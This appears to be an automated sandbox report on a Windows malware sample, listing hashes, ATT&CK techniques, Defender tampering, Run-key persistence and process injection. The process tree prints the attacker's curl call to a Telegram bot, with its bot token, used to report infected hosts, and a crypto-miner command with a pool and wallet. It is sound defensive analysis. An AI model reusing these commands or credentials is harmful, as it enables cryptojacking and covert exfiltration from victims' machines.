914cd602a58f69dd35dd207d8128807926a139f27f4d8b7b2b958041783bc10c

General

Target

b81f2f2d3c122a53a0c99f0b21e0ff79.exe
Size

6.9MB
MD5

b81f2f2d3c122a53a0c99f0b21e0ff79
SHA1

9b7e2b6b3464b5130f05b10f170e07fc8356ad2e
SHA256

914cd602a58f69dd35dd207d8128807926a139f27f4d8b7b2b958041783bc10c
SHA512

51ca133984ade0dbf6d926185a948c13f421da2dbe23b51bb2df22fd3c4c153de593e993b497f97ea18ae9e4060a14a3cdb537c27bc2922483235d2563402c76

Score

10^/10

evasion persistence themida trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Executes dropped EXE 2 IoCs

Processes:

steal.exe123.exe

pid process

4596 steal.exe
3584 123.exe

pid	process
4596	steal.exe
3584	123.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/1532-137-0x0000000140000000-0x000000014274C000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

123.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	123.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	123.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\123.exe	themida
C:\Users\Admin\AppData\Local\Temp\123.exe	themida
behavioral2/memory/3584-134-0x00007FF703C90000-0x00007FF704594000-memory.dmp	themida
behavioral2/memory/3584-135-0x00007FF703C90000-0x00007FF704594000-memory.dmp	themida
behavioral2/memory/3584-136-0x00007FF703C90000-0x00007FF704594000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

123.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	123.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

123.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 123.exe
Suspicious use of SetThreadContext 2 IoCs

Processes:

123.exe

description pid process target process

PID 3584 set thread context of 1532 3584 123.exe bfsvc.exe
PID 3584 set thread context of 4568 3584 123.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	123.exe

description	pid	process	target process
PID 3584 set thread context of 1532	3584	123.exe	bfsvc.exe
PID 3584 set thread context of 4568	3584	123.exe	explorer.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

b81f2f2d3c122a53a0c99f0b21e0ff79.exe123.exe

description	pid	process	target process
PID 4956 wrote to memory of 4596	4956	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	steal.exe
PID 4956 wrote to memory of 4596	4956	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	steal.exe
PID 4956 wrote to memory of 4596	4956	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	steal.exe
PID 4956 wrote to memory of 3584	4956	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	123.exe
PID 4956 wrote to memory of 3584	4956	b81f2f2d3c122a53a0c99f0b21e0ff79.exe	123.exe
PID 3584 wrote to memory of 2160	3584	123.exe	curl.exe
PID 3584 wrote to memory of 2160	3584	123.exe	curl.exe
PID 3584 wrote to memory of 1532	3584	123.exe	bfsvc.exe
PID 3584 wrote to memory of 1532	3584	123.exe	bfsvc.exe
PID 3584 wrote to memory of 1532	3584	123.exe	bfsvc.exe
PID 3584 wrote to memory of 1532	3584	123.exe	bfsvc.exe
PID 3584 wrote to memory of 1532	3584	123.exe	bfsvc.exe
PID 3584 wrote to memory of 1532	3584	123.exe	bfsvc.exe
PID 3584 wrote to memory of 1532	3584	123.exe	bfsvc.exe
PID 3584 wrote to memory of 1532	3584	123.exe	bfsvc.exe
PID 3584 wrote to memory of 1532	3584	123.exe	bfsvc.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe
PID 3584 wrote to memory of 4568	3584	123.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\b81f2f2d3c122a53a0c99f0b21e0ff79.exe
"C:\Users\Admin\AppData\Local\Temp\b81f2f2d3c122a53a0c99f0b21e0ff79.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4956

C:\Users\Admin\AppData\Local\Temp\steal.exe
C:\Users\Admin\AppData\Local\Temp\steal.exe
2⤵
- Executes dropped EXE
PID:4596

C:\Users\Admin\AppData\Local\Temp\123.exe
C:\Users\Admin\AppData\Local\Temp\123.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3584

C:\Windows\SYSTEM32\curl.exe
curl "https://api.telegram.org/bot5091596467:AAFHA5degKMEAHZHV4pD9gfMs7VtZ9Z4EBs/sendMessage?chat_id=-1001750796132&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0AWorker Tag: ga%0A(Windows Defender has been turned off)"
3⤵
PID:2160

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe --algo ETCHASH --pool eu1-etc.ethermine.org:4444 --user 0x7D77fc78A83E9c01b08b33584EccbB71d2dFcA12 --worker g22
3⤵
PID:1532

C:\Windows\explorer.exe
C:\Windows\explorer.exe "qwe1" "Microsoft%20Basic%20Display%20Adapter" "ga" "etc"
3⤵
PID:4568

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Disabling Security Tools

1

T1089

Virtualization/Sandbox Evasion

1

T1497

Credential Access

Discovery

Query Registry

2

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\123.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
C:\Users\Admin\AppData\Local\Temp\123.exe
MD5
f18bb590bdf69d8571ad7da70faa921b

SHA1
47f58cf547153e5fc89165fbd83b118c51793569

SHA256
0d276de3a1e7ef5de4f770d84735afacbc771c35118d46e1cecb49d1eedaec69

SHA512
fd2052b58297a2a2aa8ebd2a7d85f0abfff7db7fa601c3cebd29198e085e14aeda2615de3a8104112f038c975e1329c1bd4d5542d89bc136eb222e1955933817

Download Submit
C:\Users\Admin\AppData\Local\Temp\steal.exe
MD5
231147ca2fbb27db182411c726d9489e

SHA1
540fac37b19f2361973f3771a9ce4453dd1d370f

SHA256
9bee06359c7817269767dc482760caeb14644b9607bce3231bf6d1760342fb28

SHA512
a5c0b320f292fd60c4556cf3c04d399cc17ce941dbee9aabc4b03d7f396a9a59c7212e818220f641223161605f73bf0d28010ea0bc1ed7e4306c1ef983dd7691

Download Submit
C:\Users\Admin\AppData\Local\Temp\steal.exe
MD5
231147ca2fbb27db182411c726d9489e

SHA1
540fac37b19f2361973f3771a9ce4453dd1d370f

SHA256
9bee06359c7817269767dc482760caeb14644b9607bce3231bf6d1760342fb28

SHA512
a5c0b320f292fd60c4556cf3c04d399cc17ce941dbee9aabc4b03d7f396a9a59c7212e818220f641223161605f73bf0d28010ea0bc1ed7e4306c1ef983dd7691

Download Submit
memory/1532-137-0x0000000140000000-0x000000014274C000-memory.dmp

Filesize
39.3MB

Download
memory/3584-134-0x00007FF703C90000-0x00007FF704594000-memory.dmp

Filesize
9.0MB

Download
memory/3584-135-0x00007FF703C90000-0x00007FF704594000-memory.dmp

Filesize
9.0MB

Download
memory/3584-136-0x00007FF703C90000-0x00007FF704594000-memory.dmp

Filesize
9.0MB

Download
memory/4568-138-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads